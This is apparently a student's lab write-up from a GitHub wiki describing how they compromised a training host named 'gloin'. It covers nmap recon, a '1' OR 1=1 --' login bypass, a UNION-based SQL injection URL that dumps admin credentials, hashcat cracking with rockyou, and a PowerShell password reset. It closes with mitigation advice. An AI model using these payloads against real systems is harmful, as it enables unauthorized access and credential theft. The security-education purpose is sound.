Lab 9.2 Exploiting Gloin - zacharylongo/Tech-Journals GitHub Wiki

During this lab I tuilized SQL injection to exploit "gloin"(10.0.5.31)

Notes / Steps taken

Firstly, I used the "dns-resolver" script that we previously used to get the IP address for "gloin".

I used /ndns-rsolver.sh 10.0.5 10.0.5.22

image

Then I used nmap to peform a base scan of the target and then a deeper scan on ports 22,443, and 3389.

sudo nmap 10.0.5.31

image

sudo nmap 10.0.5.31 -p 22,443,3389 -A

image

image

  • Navigating to the address (knowing web port is open) the following appears: image

  • After experimenting for a while in the "reference code" field, I realized that I could cause an error using several characters (such as ')

image

  • This in turn, clued me in that the box was likely vulnerable to SQL injection.

Using the Firefox network management feature, I was able to view the raw error message.

image

  • The computer seems to be using C: drive, this likely means the host is using a windows distro.

  • With a hint from a past student, I was able to figure out that the application's source code was publicaly available; with this I derived admin credentials.

image

### INSERTED INTO THE USERNAME FIELD (PASSWORD FIELD BUT MUST CONTAIN SOMETHING!!!) ### 1' OR 1=1 --

Utilizing SQL injection, I was able to skate past authentication and gain full access to the admin login page.

image

Using further sql injection and UNION commands, I was able to find the amount of columns in the database. After this, I searched for a .db file. Assumedly, there was one:

image

  • With some major help from the aforementioned prior student, I gained knowledge of this exploit which allowed me to gain access to the tables.

image

Using the same exploit, I was now able to get the admin username and hashed password.

### EXPLOIT ### https://10.0.5.31/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;

image

  • I then used hash-identifier to crack the hash, which turned out to be MD5.

  • Using the rockyou.txt wordlist and hashcat -m 0 4214db3884e9cd913b49b5b44e49ae96 /usr/share/wordlists/rockyou.txt and --show I foudn the following:

image

  • I was then able to login:

image

  • Under users, I noticed the gloin user:

image

  • I then used powershell commands to change the password as well as ran this:

Set-LocalUser -Name gloin -Password $password -Verbose

I then was able to login as gloin 😈

image

How do we mitigate these vulnerabilites?

  • No reused passwords: There should have been no reason for a duplicate password for the portal and webapp. Simplest best practice ever created.

  • **Utilize prepared statements (and parameters for queries) Developers should use prepared statements (with parameterized queries) so that a user cannot change the intent of a database query regardless of what SQL commands are inserted.

Reflection

  • This lab was extremely difficult and I would likely have found myself stuck without help. My recon was sorely lacking and I didn't utilize searchsploit until after a classmate had told me. Using searchsploit I easily could have found a suitable exploit without endlessly trying alternate methods. In the future this will be a must.

  • At the beginning of the lab I decided to try and make another DNS script instead of using the one I had made prior. Mistakes in syntax cost me a great amount of time starting up. Additionally, after using my script; I realized I didn't provide usage or well-documented annotations which made its application difficult (albeit less than working from scratch).